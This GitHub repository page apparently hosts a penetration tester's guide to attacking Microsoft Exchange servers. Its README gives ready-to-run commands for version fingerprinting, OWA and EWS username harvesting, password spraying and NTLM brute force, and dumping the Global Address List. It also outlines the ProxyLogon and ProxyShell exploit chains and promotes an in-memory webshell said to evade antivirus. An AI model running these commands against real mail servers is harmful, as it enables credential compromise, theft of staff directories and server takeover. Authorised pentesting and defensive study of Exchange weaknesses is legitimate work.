Skip to content
/ exchange-penetration-testing Public

The great Microsoft exchange hack: A penetration tester’s guide (exchange penetration testing)

License

CC0-1.0 license
59 stars 19 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

kh4sh3i/exchange-penetration-testing

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits

GAL

GAL

 
 

bruteforce

bruteforce

 
 

img

img

 
 

GhostWebShell.cs

GhostWebShell.cs

 
 

LICENSE

LICENSE

 
 

MailSniper.ps1

MailSniper.ps1

 
 

README.md

README.md

 
 

get_exchange_version.py

get_exchange_version.py

 
 

Repository files navigation

exchange penetration testing

The great Microsoft exchange hack: A penetration tester’s guide (exchange penetration testing)

1) Recon

sudo python3 get_exchange_version.py https://mail.target.com

2) Bruteforce

use MailSniper enum

Import-Module MailSniper.ps1
Invoke-DomainHarvestOWA -ExchHostname mail.domain.com

Password Spray

  • PasswordSprayOWA : will attempt to connect to an OWA portal and perform a password spraying attack using a userlist and a single password.
  • PasswordSprayEWS : will attempt to connect to an EWS portal and perform a password spraying attack using a userlist and a single password.
Import-Module MailSniper.ps1
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt

python NTLM password Sparay

python3 bruteforce/bruteforce.py -t https://mail.domain.com/EWS/Exchange.asmx -U users.txt -p TestPassword

3) GAL

The Microsoft Exchange Global Address List (GAL) is a list of all end users and their respective email addresses within an Exchange Server organization that uses Microsoft Outlook for email.

use exchanger.py impacket

python GAL/exchanger.py DomainName/Username:"Password"@mail.domain.com nspi list-tables

use ruler

GAL/ruler-linux64 --url https://mail.domain.com/autodiscover/autodiscover.xml --email [email protected] -d DomainName -u Username -p Password --debug --verbose  abk dump --output gal.txt

use ewsManage.py

python3 GAL/ewsManage.py mail.domain.com 443 plaintext DomainName Username Password findallpeopl
  • for export GAL we should enum valid username,password and email first !

4) ProxyLogon

ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution.

5) ProxyShell

CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability. This faulty URL normalization lets us access an arbitrary backend URL while running as the Exchange Server machine account. Although this bug is not as powerful as the SSRF in ProxyLogon, and we could manipulate only the path part of the URL

6) WebShell

  • GhostWebShell (Author: Soroush Dalili (@irsdl)) only load in Ram and AV can not detect it !
  • it useful in proxylogn and proxy shell
use GhostWebShell.cs

most famous cve

cve-2021-31206
cve-2021-31207
cve-2021-34473
cve-2021-34523
cve-2021-26855
cve-2021-26857
cve-2021-26858
cve-2021-27065
cve-2015-1635

Reference

About

The great Microsoft exchange hack: A penetration tester’s guide (exchange penetration testing)

Topics

mail exploit exchange pentesting pentest exchange-server pentest-tool zeroday redteam

Resources

Readme

License

CC0-1.0 license
Activity

Stars

59 stars

Watchers

3 watching

Forks

19 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

Languages